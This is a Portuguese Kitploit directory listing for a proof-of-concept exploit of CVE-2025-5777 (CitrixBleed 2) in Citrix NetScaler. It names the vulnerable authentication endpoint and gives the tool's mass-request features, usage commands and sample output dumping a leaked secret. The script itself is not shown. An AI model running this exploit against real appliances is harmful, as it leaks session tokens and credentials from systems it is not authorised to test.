Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-5777 — Citrix NetScaler Vazamento de Memória PoC | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2025-5777
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebTestes de PenetraçãoRed Teaming
GitHub0xgh057r3c0n/cve-2025-5777

CVE-2025-5777

Citrix NetScaler Vazamento de Memória PoC

Ver Repositório
243há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-5777 - PoC de Vazamento de Memória do Citrix NetScaler

📌 Descrição

Este script explora uma vulnerabilidade crítica de divulgação de memória em appliances Citrix NetScaler ADC/Gateway, identificada como CVE-2025-5777 (apelidada de CitrixBleed 2). Ele aciona um vazamento de memória através do endpoint /p/u/doAuthentication.do, revelando memória não inicializada contendo dados sensíveis como fragmentos XML, tokens e potencialmente credenciais.

  • 📅 ID CVE: CVE-2025-5777
  • ⚙️ Impacto: Divulgação de Informações
  • 🧑‍💻 Autor: [0xgh057r3c0n]
  • 🧵 Concorrência: Assíncrono com aiohttp
  • 📦 Dependências: aiohttp, colorama

🚀 Funcionalidades

  • Motor de requisições em massa assíncrono usando asyncio + aiohttp
  • Despejo hexadecimal de fragmentos de memória vazados
  • Detecção automática do vazamento de memória <InitialValue>
  • Modo verboso para depuração e pré-visualização da resposta
  • Tratamento gracioso de interrupção (Ctrl+C)

🧪 Uso

python3 CVE-2025-5777.py http://<target> [options]

🔧 Opções

OpçãoDescrição
-v, --verboseAtivar saída de depuração verbosa
-p <proxy>Usar proxy HTTP (ex.: http://127.0.0.1:8080)
-t <threads>Número de requisições concorrentes (padrão: 10)

📥 Exemplo

python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5

📤 Exemplo de Saída

_____________   _______________         _______________   ________   .________          .___________________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
        \/                  \/                  \/     \/         \/       \/                 \/                             

         Citrix NetScaler PoC de Vazamento de Memória (CVE-2025-5777)
                     Autor: 0xgh057r3c0n

[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] Vazamento de Memória InitialValue Encontrado!
[🧠] Despejo Hexadecimal:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
------------------------------------------------------------------------

[✔️ ] Vazamento confirmado. Continuando extração...

⚠️ Aviso Legal

Esta prova de conceito é destinada apenas para testes de segurança educacionais e autorizados. Escaneamento ou exploração não autorizada de sistemas que você não possui é ilegal.


Baixar ferramenta